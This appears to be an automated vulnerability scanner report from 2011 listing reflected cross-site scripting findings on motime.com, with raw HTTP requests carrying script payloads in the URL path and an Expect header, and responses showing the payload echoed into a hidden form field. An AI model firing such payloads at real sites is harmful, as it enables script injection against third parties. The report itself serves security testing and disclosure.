1. Cross-site scripting (reflected)
1.1. http://www.motime.com/favicon.ico [REST URL parameter 1]
1.2. http://www.motime.com/favicon.ico [REST URL parameter 1]
Severity: | High |
Confidence: | Certain |
Host: | http://www.motime.com |
Path: | /favicon.ico |
GET /favicon.ico13a4a</script><script User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.motime.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: nginx/0.7.63 Date: Fri, 01 Apr 2011 11:38:32 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.2.12-pl0-gentoo Edge-control: bypass-cache=on Content-Length: 34367 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <script type="text/javascript"> _dadanet.registerStartup( ['classes/FormManager', 'classes/CommObjects'], function() { var co_opts = { uri: 'http://www.motime.com dict:{ 'op_in_progress_desc': '', 'is_friend': 'We are friends', 'invite_already_send': 'Invite already sent', 'invite_send': 'Invitation sent', 'invite_blocked': 'Invites blocked by user', 'is_fan' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.motime.com |
Path: | /favicon.ico |
GET /favicon.icof9283"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.motime.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: nginx/0.7.63 Date: Fri, 01 Apr 2011 11:38:19 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.2.12-pl0-gentoo Edge-control: bypass-cache=on Content-Length: 34347 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <input type="hidden" name="returnurl" value="/favicon.icof9283"><script>alert(1)< ...[SNIP]... |